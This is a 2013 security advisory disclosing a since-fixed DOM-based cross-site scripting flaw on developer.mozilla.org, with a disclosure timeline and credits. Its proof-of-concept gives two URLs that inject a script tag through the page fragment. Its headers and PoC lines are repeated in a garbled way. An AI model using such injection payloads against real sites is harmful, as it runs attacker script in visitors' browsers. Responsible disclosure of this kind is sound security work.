SSCHADV2013-010 - developer.mozilla.org DOMbased Cross-site Scripting vulnerability
Advisory:
|
developer.mozilla.org - DOM based Cross-site Scripting vulnerability
|
Advisory ID:
|
SSCHADV2013-010
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on developer.mozilla.org
|
Vendor URL:
|
|
Vendor Status:
|
fixed
|
==========================
Vulnerability Description
==========================
Vulnerability Description
==========================
The website 'developer.mozilla.org' is prone to a DOM based XSS vulnerability
==========================
Vulnerability Description
==========================
The website 'developer.mozilla.org' is prone to a DOM based XSS vulnerability.
==========================
PoC-Exploit
==========================
// Chrome 27.0 & Internet Explorer 10
Vulnerability Description
==========================
The website 'developer.mozilla.org' is prone to a DOM based XSS vulnerability.
==========================
PoC-Exploit
==========================
// Chrome 27.0 & Internet Explorer 10
https://developer.mozilla.org/en-US/docs/Code_Review_FAQ#'/><script>alert(8);</script> https://developer.mozilla.org/en-US/docs/Code_Review_FAQ#'/><script>alert(document.domain);</script> |
==========================
Disclosure Timeline
==========================
28-May-2013 - developer informed on bugzilla.mozilla.org
12-Jun-2013 - fixed by developer
==========================
Credits
==========================
Vulnerability found and advisory written by Stefan Schurtz.
==========================
References
==========================
http://www.mozilla.org
http://www.darksecurity.de/advisories/2013/SSCHADV2013-010.txt
Comments
Display comments as Linear | Threaded